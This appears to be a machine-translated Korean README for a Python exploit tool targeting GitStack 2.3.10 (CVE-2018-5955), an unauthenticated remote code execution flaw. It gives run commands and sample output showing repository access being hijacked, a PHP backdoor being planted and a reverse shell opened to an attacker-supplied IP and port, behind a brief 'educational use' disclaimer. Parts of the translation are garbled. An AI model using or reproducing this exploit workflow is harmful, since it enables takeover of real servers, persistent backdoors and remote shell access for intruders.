CVE 2018 5955

CVE-2018-5955 GITSTACK 2.3.10 UNEUCTENTICATION RCE를위한 악용

악용 : Gitstack 2.3.10 무단 원격 코드 실행

날짜 : 18.01.2018

소프트웨어 링크 : https://gitstack.com/

악용 저자 : Kacper Szurek

원본 익스플로잇 : https://www.exploit-db.com/exploits/43777

웹 사이트 : https://security.szurek.pl/

카테고리 : 원격

CVE : CVE-2018-5955

날짜 : 23.06.2023

새로운 기능 : 대화식 RCE, OS 감지, 리버스 쉘 기능, Python2에서 Python3까지 적응

CVE : CVE-2018-5955

카테고리 : 원격

교육 목적으로 GitHub에 게시하거나 인증 및 승인 된 침투 테스트를 위해 귀하의 행동에 대한 책임이 없습니다.

요구 사항 설치 :

 pip install colorama

그런 다음 다음과 같이 실행할 수 있습니다.

 python3 exploit.py

• OS 탐지
• 리버스 쉘

CVE를 이용한 후 OS가 감지됩니다. 실제로이 출력 라인이 있습니다.

 [+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----

"OS"를 입력하여 운영 체제 유형을 찾을 수도 있습니다.

대상에 실제 리버스 쉘을 얻으려면 "쉘"을 입력 한 다음 IP와 듣기 포트를 입력 할 수 있습니다.

 RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE